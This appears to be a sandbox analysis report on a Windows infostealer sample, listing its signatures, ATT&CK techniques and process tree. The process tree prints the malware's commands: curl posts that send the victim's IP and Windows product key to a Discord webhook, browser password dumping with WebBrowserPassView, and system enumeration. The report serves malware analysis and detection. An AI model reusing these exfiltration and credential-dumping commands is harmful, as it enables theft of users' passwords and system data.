6851d9ae6d9c3405a7fb92d93ec0bd87e3c52a6903e29ab55f2d7b779559d4b7

Analysis

max time kernel
47s
max time network
112s
platform
windows10_x64
resource
win10v20201028
submitted
21-03-2021 18:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

460c76892a939c1b7d563171c3b2d349.exe
Size

10KB
MD5

460c76892a939c1b7d563171c3b2d349
SHA1

267857f6c93b33f87c7d3fd109d22fe3e7e33913
SHA256

6851d9ae6d9c3405a7fb92d93ec0bd87e3c52a6903e29ab55f2d7b779559d4b7
SHA512

f2e559032b4d8cdcd020e5b62fbdbe163fabe9af0c1f518eb0b33881c491c0a545297d2403a488dae752703d94ce5afa66fbfa63901bf875a5d2c0b9eee1d0ea

Score

9^/10

spyware stealer

Malware Config

Signatures

NirSoft WebBrowserPassView 2 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/files/0x00020000000152a3-19.dat	WebBrowserPassView
behavioral2/files/0x00020000000152a3-22.dat	WebBrowserPassView

Nirsoft 2 IoCs

resource	yara_rule
behavioral2/files/0x00020000000152a3-19.dat	Nirsoft
behavioral2/files/0x00020000000152a3-22.dat	Nirsoft

Executes dropped EXE 5 IoCs

pid	Process
504	curl.exe
296	curl.exe
2876	WebBrowserPassView.exe
2964	curl.exe
1896	filed.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
17	myexternalip.com
18	myexternalip.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
3168	timeout.exe

Gathers system information 1 TTPs 8 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
184	systeminfo.exe
1896	systeminfo.exe
1372	systeminfo.exe
3416	systeminfo.exe
2500	systeminfo.exe
2968	systeminfo.exe
1204	systeminfo.exe
2252	systeminfo.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings	460c76892a939c1b7d563171c3b2d349.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings	WScript.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2876	WebBrowserPassView.exe
2876	WebBrowserPassView.exe
2876	WebBrowserPassView.exe
2876	WebBrowserPassView.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	988	460c76892a939c1b7d563171c3b2d349.exe
Token: SeIncreaseQuotaPrivilege	728	WMIC.exe
Token: SeSecurityPrivilege	728	WMIC.exe
Token: SeTakeOwnershipPrivilege	728	WMIC.exe
Token: SeLoadDriverPrivilege	728	WMIC.exe
Token: SeSystemProfilePrivilege	728	WMIC.exe
Token: SeSystemtimePrivilege	728	WMIC.exe
Token: SeProfSingleProcessPrivilege	728	WMIC.exe
Token: SeIncBasePriorityPrivilege	728	WMIC.exe
Token: SeCreatePagefilePrivilege	728	WMIC.exe
Token: SeBackupPrivilege	728	WMIC.exe
Token: SeRestorePrivilege	728	WMIC.exe
Token: SeShutdownPrivilege	728	WMIC.exe
Token: SeDebugPrivilege	728	WMIC.exe
Token: SeSystemEnvironmentPrivilege	728	WMIC.exe
Token: SeRemoteShutdownPrivilege	728	WMIC.exe
Token: SeUndockPrivilege	728	WMIC.exe
Token: SeManageVolumePrivilege	728	WMIC.exe
Token: 33	728	WMIC.exe
Token: 34	728	WMIC.exe
Token: 35	728	WMIC.exe
Token: 36	728	WMIC.exe
Token: SeIncreaseQuotaPrivilege	728	WMIC.exe
Token: SeSecurityPrivilege	728	WMIC.exe
Token: SeTakeOwnershipPrivilege	728	WMIC.exe
Token: SeLoadDriverPrivilege	728	WMIC.exe
Token: SeSystemProfilePrivilege	728	WMIC.exe
Token: SeSystemtimePrivilege	728	WMIC.exe
Token: SeProfSingleProcessPrivilege	728	WMIC.exe
Token: SeIncBasePriorityPrivilege	728	WMIC.exe
Token: SeCreatePagefilePrivilege	728	WMIC.exe
Token: SeBackupPrivilege	728	WMIC.exe
Token: SeRestorePrivilege	728	WMIC.exe
Token: SeShutdownPrivilege	728	WMIC.exe
Token: SeDebugPrivilege	728	WMIC.exe
Token: SeSystemEnvironmentPrivilege	728	WMIC.exe
Token: SeRemoteShutdownPrivilege	728	WMIC.exe
Token: SeUndockPrivilege	728	WMIC.exe
Token: SeManageVolumePrivilege	728	WMIC.exe
Token: 33	728	WMIC.exe
Token: 34	728	WMIC.exe
Token: 35	728	WMIC.exe
Token: 36	728	WMIC.exe
Token: SeIncreaseQuotaPrivilege	512	WMIC.exe
Token: SeSecurityPrivilege	512	WMIC.exe
Token: SeTakeOwnershipPrivilege	512	WMIC.exe
Token: SeLoadDriverPrivilege	512	WMIC.exe
Token: SeSystemProfilePrivilege	512	WMIC.exe
Token: SeSystemtimePrivilege	512	WMIC.exe
Token: SeProfSingleProcessPrivilege	512	WMIC.exe
Token: SeIncBasePriorityPrivilege	512	WMIC.exe
Token: SeCreatePagefilePrivilege	512	WMIC.exe
Token: SeBackupPrivilege	512	WMIC.exe
Token: SeRestorePrivilege	512	WMIC.exe
Token: SeShutdownPrivilege	512	WMIC.exe
Token: SeDebugPrivilege	512	WMIC.exe
Token: SeSystemEnvironmentPrivilege	512	WMIC.exe
Token: SeRemoteShutdownPrivilege	512	WMIC.exe
Token: SeUndockPrivilege	512	WMIC.exe
Token: SeManageVolumePrivilege	512	WMIC.exe
Token: 33	512	WMIC.exe
Token: 34	512	WMIC.exe
Token: 35	512	WMIC.exe
Token: 36	512	WMIC.exe

Suspicious use of WriteProcessMemory 58 IoCs

description	pid	Process	procid_target
PID 988 wrote to memory of 3756	988	460c76892a939c1b7d563171c3b2d349.exe	75
PID 988 wrote to memory of 3756	988	460c76892a939c1b7d563171c3b2d349.exe	75
PID 3756 wrote to memory of 648	3756	WScript.exe	76
PID 3756 wrote to memory of 648	3756	WScript.exe	76
PID 648 wrote to memory of 188	648	WScript.exe	77
PID 648 wrote to memory of 188	648	WScript.exe	77
PID 188 wrote to memory of 504	188	cmd.exe	79
PID 188 wrote to memory of 504	188	cmd.exe	79
PID 188 wrote to memory of 296	188	cmd.exe	80
PID 188 wrote to memory of 296	188	cmd.exe	80
PID 188 wrote to memory of 2876	188	cmd.exe	81
PID 188 wrote to memory of 2876	188	cmd.exe	81
PID 188 wrote to memory of 2876	188	cmd.exe	81
PID 188 wrote to memory of 2252	188	cmd.exe	82
PID 188 wrote to memory of 2252	188	cmd.exe	82
PID 188 wrote to memory of 1132	188	cmd.exe	83
PID 188 wrote to memory of 1132	188	cmd.exe	83
PID 188 wrote to memory of 184	188	cmd.exe	88
PID 188 wrote to memory of 184	188	cmd.exe	88
PID 188 wrote to memory of 3676	188	cmd.exe	89
PID 188 wrote to memory of 3676	188	cmd.exe	89
PID 188 wrote to memory of 1896	188	cmd.exe	90
PID 188 wrote to memory of 1896	188	cmd.exe	90
PID 188 wrote to memory of 1296	188	cmd.exe	91
PID 188 wrote to memory of 1296	188	cmd.exe	91
PID 188 wrote to memory of 1372	188	cmd.exe	93
PID 188 wrote to memory of 1372	188	cmd.exe	93
PID 188 wrote to memory of 2100	188	cmd.exe	94
PID 188 wrote to memory of 2100	188	cmd.exe	94
PID 188 wrote to memory of 3416	188	cmd.exe	95
PID 188 wrote to memory of 3416	188	cmd.exe	95
PID 188 wrote to memory of 692	188	cmd.exe	96
PID 188 wrote to memory of 692	188	cmd.exe	96
PID 188 wrote to memory of 2500	188	cmd.exe	97
PID 188 wrote to memory of 2500	188	cmd.exe	97
PID 188 wrote to memory of 3040	188	cmd.exe	98
PID 188 wrote to memory of 3040	188	cmd.exe	98
PID 188 wrote to memory of 2968	188	cmd.exe	99
PID 188 wrote to memory of 2968	188	cmd.exe	99
PID 188 wrote to memory of 3044	188	cmd.exe	100
PID 188 wrote to memory of 3044	188	cmd.exe	100
PID 188 wrote to memory of 1204	188	cmd.exe	101
PID 188 wrote to memory of 1204	188	cmd.exe	101
PID 188 wrote to memory of 3180	188	cmd.exe	102
PID 188 wrote to memory of 3180	188	cmd.exe	102
PID 188 wrote to memory of 728	188	cmd.exe	103
PID 188 wrote to memory of 728	188	cmd.exe	103
PID 188 wrote to memory of 512	188	cmd.exe	104
PID 188 wrote to memory of 512	188	cmd.exe	104
PID 188 wrote to memory of 2652	188	cmd.exe	105
PID 188 wrote to memory of 2652	188	cmd.exe	105
PID 188 wrote to memory of 2964	188	cmd.exe	106
PID 188 wrote to memory of 2964	188	cmd.exe	106
PID 188 wrote to memory of 1896	188	cmd.exe	107
PID 188 wrote to memory of 1896	188	cmd.exe	107
PID 188 wrote to memory of 1896	188	cmd.exe	107
PID 188 wrote to memory of 3168	188	cmd.exe	108
PID 188 wrote to memory of 3168	188	cmd.exe	108

C:\Users\Admin\AppData\Local\Temp\460c76892a939c1b7d563171c3b2d349.exe
"C:\Users\Admin\AppData\Local\Temp\460c76892a939c1b7d563171c3b2d349.exe"
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:988
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\temp\finalres.vbs"
  2⤵
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:3756
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\temp\finalres2.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:648
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\temp\finalres.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:188
    - - C:\temp\curl.exe
        
        C:/temp/curl -X POST -H "Content-type: application/json" --data "{\"content\": \"**Hey Machos. Extraction was successful.**\"}" https://discordapp.com/api/webhooks/812010029556432946/cR78AVIHBOdzVZKLTZyxTYPyO8Zxl7AHlImj-qXIF6Ue767lT1m1Gsek0tpc8FRIm7sC
        5⤵
        Executes dropped EXE
        
        PID:504
    - - C:\temp\curl.exe
        
        C:/temp/curl "https://myexternalip.com/raw"
        5⤵
        Executes dropped EXE
        
        PID:296
    - - C:\temp\WebBrowserPassView.exe
        
        C:/temp/WebBrowserPassView.exe /stext "C:/temp/Admin_Passwords.txt"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2876
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:2252
    - - C:\Windows\system32\findstr.exe
        
        findstr /c:"Host Name"
        5⤵
        
        PID:1132
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:184
    - - C:\Windows\system32\findstr.exe
        
        findstr /c:"Domain"
        5⤵
        
        PID:3676
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:1896
    - - C:\Windows\system32\findstr.exe
        
        findstr /c:"OS Name"
        5⤵
        
        PID:1296
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:1372
    - - C:\Windows\system32\findstr.exe
        
        findstr /c:"OS Version"
        5⤵
        
        PID:2100
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:3416
    - - C:\Windows\system32\findstr.exe
        
        findstr /c:"System Manufacturer"
        5⤵
        
        PID:692
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:2500
    - - C:\Windows\system32\findstr.exe
        
        findstr /c:"System Model"
        5⤵
        
        PID:3040
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:2968
    - - C:\Windows\system32\findstr.exe
        
        findstr /c:"System type"
        5⤵
        
        PID:3044
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:1204
    - - C:\Windows\system32\findstr.exe
        
        findstr /c:"Total Physical Memory"
        5⤵
        
        PID:3180
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get size
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:728
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic bios get serialnumber
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:512
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic cpu get name
        5⤵
        
        PID:2652
    - - C:\temp\curl.exe
        
        C:/temp/curl -X POST -H "Content-type: application/json" --data "{\"content\": \"**Admin**\n```asciidoc\nTime and Date :: Sun 03/21/2021 18:55:19.04\nIP Address :: 154.61.71.51\nWindows Info :: Product Name: Windows 10 Pro, Product ID: 00331-10000-00001-AA505, Installed Key: W269N-WFGWX-YVC9B-4J6C9-T83GX\n```\n\"}" https://discordapp.com/api/webhooks/812010029556432946/cR78AVIHBOdzVZKLTZyxTYPyO8Zxl7AHlImj-qXIF6Ue767lT1m1Gsek0tpc8FRIm7sC
        5⤵
        Executes dropped EXE
        
        PID:2964
    - - C:\temp\filed.exe
        
        "C:\temp\filed.exe" --processStart filed.exe
        5⤵
        Executes dropped EXE
        
        PID:1896
    - - C:\Windows\system32\timeout.exe
        
        timeout 5
        5⤵
        Delays execution with timeout.exe
        
        PID:3168

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/988-3-0x000001D9C0AA0000-0x000001D9C0AA1000-memory.dmp

Filesize
4KB

Download
memory/988-2-0x00007FFA14A00000-0x00007FFA153EC000-memory.dmp

Filesize
9.9MB

Download
memory/988-5-0x000001D9DB830000-0x000001D9DB832000-memory.dmp

Filesize
8KB

Download
memory/1896-45-0x0000000073310000-0x00000000739FE000-memory.dmp

Filesize
6.9MB

Download
memory/1896-46-0x00000000002C0000-0x00000000002C1000-memory.dmp

Filesize
4KB

Download
memory/1896-48-0x0000000004D00000-0x0000000004D01000-memory.dmp

Filesize
4KB

Download